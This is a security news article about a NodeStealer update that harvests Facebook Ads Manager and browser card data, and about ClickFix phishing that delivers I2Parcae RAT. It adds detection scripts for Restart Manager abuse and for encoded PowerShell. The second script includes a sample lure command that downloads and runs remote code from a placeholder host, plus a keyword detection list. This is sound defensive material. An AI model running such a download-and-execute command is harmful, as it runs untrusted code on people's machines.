Threat hunters are warning about an updated version of the Python-based NodeStealer that's now equipped to extract more information from victims' Facebook Ads Manager accounts and harvest credit card data stored in web browsers.
"They collect budget details of Facebook Ads Manager accounts of their victims, which might be a gateway for Facebook malvertisement," Netskope Threat Labs researcher Jan Michael Alcantara said in a report shared with The Hacker News.
"New techniques used by NodeStealer include using Windows Restart Manager to unlock browser database files, adding junk code, and using a batch script to dynamically generate and execute the Python script."
NodeStealer, first publicly documented by Meta in May 2023, started off as JavaScript malware before evolving into a Python stealer capable of gathering data related to Facebook accounts in order to facilitate their takeover.
It's assessed to be developed by Vietnamese threat actors, who have a history of leveraging various malware families that are centered around hijacking Facebook advertising and business accounts to fuel other malicious activities.
The latest analysis from Netskope shows that NodeStealer artifacts have begun to target Facebook Ads Manager accounts that are used to manage ad campaigns across Facebook and Instagram, in addition to striking Facebook Business accounts.
In doing so, it's suspected that the intention of the attackers is not just to take control of Facebook accounts, but to also weaponize them for use in malvertising campaigns that further propagate the malware under the guise of popular software or games.
"We recently found several Python NodeStealer samples that collect budget details of the account using Facebook Graph API," Michael Alcantara explained. "The samples initially generate an access token by logging into adsmanager.facebook[.]com using cookies collected on the victim's machine."
Aside from collecting the tokens and business-related information tied to those accounts, the malware includes a check that's explicitly designed to avoid infecting machines located in Vietnam, a likely attempt to evade local law enforcement action that further supports the assessment of its origins.
On top of that, certain NodeStealer samples have been found to use the legitimate Windows Restart Manager API to unlock SQLite database files that may be held open by a running browser process, so that credit card data saved in various web browsers can be copied out of them.
Data exfiltration is achieved using Telegram, underscoring that the messaging platform continues to be a crucial vector for cybercriminals despite recent changes to its policy.
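A practical detection angle on the Restart Manager technique, as an added example rather than code from Netskope's report or from the NodeStealer samples: rstrtmgr.dll is normally loaded by installers and Windows servicing components, so a load of that DLL by a scripting interpreter, or by an executable running out of a user-writable directory, is worth alerting on. The Python below scans Sysmon Event ID 7 (ImageLoad) records for exactly that; the event lines, the interpreter set and the path markers are constructed for this example and should be tuned against your own baseline.

```python
import json
from pathlib import PureWindowsPath

# Process images that have no business loading the Restart Manager client
# DLL. A PyInstaller-packed stealer runs as its own .exe rather than as
# python.exe, which is what the user-writable-path rule below is for.
INTERPRETERS = {
    "python.exe", "pythonw.exe", "powershell.exe", "pwsh.exe",
    "wscript.exe", "cscript.exe", "mshta.exe",
}
# Lower-case path fragments (with surrounding backslashes) that mark
# directories a standard user can write to. Constructed list; extend it.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")

# Sysmon Event ID 7 (ImageLoad) records as JSON lines, constructed for this
# example. Only the fields the logic reads are included.
SAMPLE_EVENTS = [
    r'{"EventID": 7, "ProcessId": 4412, "Image": "C:\\Windows\\System32\\msiexec.exe", "ImageLoaded": "C:\\Windows\\System32\\rstrtmgr.dll"}',
    r'{"EventID": 7, "ProcessId": 9120, "Image": "C:\\Program Files\\Python312\\python.exe", "ImageLoaded": "C:\\Windows\\System32\\rstrtmgr.dll"}',
    r'{"EventID": 7, "ProcessId": 7736, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\GameSetup.exe", "ImageLoaded": "C:\\Windows\\System32\\rstrtmgr.dll"}',
    r'{"EventID": 7, "ProcessId": 5204, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "ImageLoaded": "C:\\Windows\\System32\\winhttp.dll"}',
]


def classify(event):
    """Return a reason string if this ImageLoad event is suspicious, else None."""
    if event.get("EventID") != 7:
        return None
    loaded = PureWindowsPath(event.get("ImageLoaded", "")).name.lower()
    if loaded != "rstrtmgr.dll":
        return None
    image_path = event.get("Image", "")
    image = PureWindowsPath(image_path).name.lower()
    if image in INTERPRETERS:
        return "scripting interpreter loaded Restart Manager"
    if any(marker in image_path.lower() for marker in USER_WRITABLE):
        return "Restart Manager loaded by an executable in a user-writable path"
    return None


def scan(lines):
    """Parse JSON event lines and return (pid, image, reason) for each hit."""
    hits = []
    for line in lines:
        event = json.loads(line)
        reason = classify(event)
        if reason:
            hits.append((event["ProcessId"], event["Image"], reason))
    return hits


if __name__ == "__main__":
    for pid, image, reason in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: {image}: {reason}")
```

Sysmon does not log file reads, so the open of the browser's SQLite store itself is invisible here; what you can correlate is this image load followed shortly by a Sysmon Event ID 5 (ProcessTerminate) for the browser, which is what a Restart Manager shutdown of the lock holder produces.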
Malvertising via Facebook is a lucrative infection pathway, often impersonating trusted brands to disseminate all kinds of malware. This is evidenced by the emergence of a new campaign starting November 3, 2024, that has mimicked the Bitwarden password manager software through Facebook sponsored ads to install a rogue Google Chrome extension.
"The malware gathers personal data and targets Facebook business accounts, potentially leading to financial losses for individuals and businesses," Bitdefender said in a report published Monday. "Once again, this campaign highlights how threat actors exploit trusted platforms like Facebook to lure users into compromising their own security."
Phishing Emails Distribute I2Parcae RAT via ClickFix Technique
The development comes as Cofense has alerted to new phishing campaigns that employ website contact forms and invoice-themed lures to deliver malware families like I2Parcae RAT and PythonRatLoader, respectively, with the latter acting as a conduit to deploy AsyncRAT, DCRat, and Venom RAT.
I2Parcae is "notable for having several unique tactics, techniques, and procedures (TTPs), such as Secure Email Gateway (SEG) evasion by proxying emails through legitimate infrastructure, fake CAPTCHAs, abusing hardcoded Windows functionality to hide dropped files, and C2 capabilities over Invisible Internet Project (I2P), a peer-to-peer anonymous network with end-to-end encryption," Cofense researcher Kahng An said.
"When infected, I2Parcae is capable of disabling Windows Defender, enumerating Windows Security Accounts Manager (SAM) for accounts/groups, stealing browser cookies, and remote access to infected hosts."
Attack chains involve the propagation of booby-trapped pornographic links in email messages that, upon clicking, lead message recipients to an intermediate fake CAPTCHA verification page, which urges victims to copy and execute an encoded PowerShell script in order to access the content, a technique that has been called ClickFix.
ClickFix, in recent months, has become a popular social engineering trick to lure unsuspecting users into downloading malware under the pretext of addressing a purported error or completing a reCAPTCHA verification. It's also effective at sidestepping security controls owing to the fact that users infect themselves by executing the code.
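To show what the pasted ClickFix command looks like from the defender's side, here is an added example that is not code from Cofense's or Proofpoint's research: the one-liner the fake CAPTCHA page asks the victim to run usually invokes powershell.exe with -EncodedCommand, whose argument is base64 over the UTF-16LE bytes of the script (that the lure uses -EncodedCommand is my assumption). The Python below pulls that argument out of a process-creation command line, decodes it and flags download-and-execute indicators; the lure script, the URL under example.invalid and the indicator list are constructed for the example.

```python
import base64
import binascii
import re

# Any unambiguous prefix of -EncodedCommand that powershell.exe accepts
# (-e, -ec, -enc, ..., -encodedcommand), followed by the base64 argument.
# The lookbehind keeps "-ep"/"-exec" style switches from matching.
ENC_ARG = re.compile(r"(?i)(?<![\w-])-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})")

# Constructed indicator patterns, applied to the lower-cased decoded script.
INDICATORS = {
    "iex": r"\biex\b",
    "invoke-expression": r"\binvoke-expression\b",
    "iwr": r"\biwr\b",
    "invoke-webrequest": r"\binvoke-webrequest\b",
    "downloadstring": r"downloadstring",
    "frombase64string": r"frombase64string",
    "url": r"\bhttps?://",
}


def decode_encoded_command(b64):
    """Decode a -EncodedCommand argument; None if it is not valid base64."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    # PowerShell encodes the script as UTF-16LE before base64-encoding it.
    return raw.decode("utf-16-le", errors="replace")


def analyze_command_line(cmd):
    """Find and decode an encoded PowerShell command, and score its contents."""
    result = {"encoded": False, "decoded": None, "indicators": []}
    match = ENC_ARG.search(cmd)
    if not match:
        return result
    decoded = decode_encoded_command(match.group(1))
    if decoded is None:
        return result
    result["encoded"] = True
    result["decoded"] = decoded
    low = decoded.lower()
    result["indicators"] = [
        name for name, pattern in INDICATORS.items() if re.search(pattern, low)
    ]
    return result


# Constructed lure: fetch a script from a placeholder host and run it in memory,
# which is the shape of a typical ClickFix payload. The command line is what
# Sysmon Event ID 1 or a Win+R RunMRU entry would record.
LURE_SCRIPT = "$u='http://example.invalid/verify.txt'; iex (iwr $u -UseBasicParsing).Content"
ENCODED = base64.b64encode(LURE_SCRIPT.encode("utf-16-le")).decode("ascii")
CLICKFIX_CMD = f"powershell.exe -w hidden -nop -enc {ENCODED}"

if __name__ == "__main__":
    report = analyze_command_line(CLICKFIX_CMD)
    print("decoded:", report["decoded"])
    print("indicators:", report["indicators"])
```

Because the victim pastes the command into the Run dialog, the same string also lands in the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU; those values carry a trailing "\1" that falls outside the base64 alphabet, so the function can be pointed at them unchanged during forensics.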
Enterprise security firm Proofpoint said that the ClickFix technique is being used by multiple "unattributed" threat actors to deliver an array of remote access trojans, stealers, and even post-exploitation frameworks such as Brute Ratel C4. It has even been adopted by suspected Russian espionage actors to breach Ukrainian government entities.
"Threat actors have been observed recently using a fake CAPTCHA themed ClickFix technique that pretends to validate the user with a 'Verify You Are Human' (CAPTCHA) check," security researchers Tommy Madjar and Selena Larson said. "Much of the activity is based on an open source toolkit named reCAPTCHA Phish available on GitHub for 'educational purposes.'"
"What's insidious about this technique is the adversaries are preying on people's innate desire to be helpful and independent. By providing what appears to be both a problem and a solution, people feel empowered to 'fix' the issue themselves without needing to alert their IT team or anyone else, and it bypasses security protections by having the person infect themselves."
The disclosures also coincide with a rise in phishing attacks that make use of bogus Docusign requests to bypass detection and ultimately conduct financial fraud.
"These attacks pose a dual threat for contractors and vendors – immediate financial loss and potential business disruption," SlashNext said. "When a fraudulent document is signed, it can trigger unauthorized payments while simultaneously creating confusion about actual licensing status. This uncertainty can lead to delays in bidding on new projects or maintaining current contracts."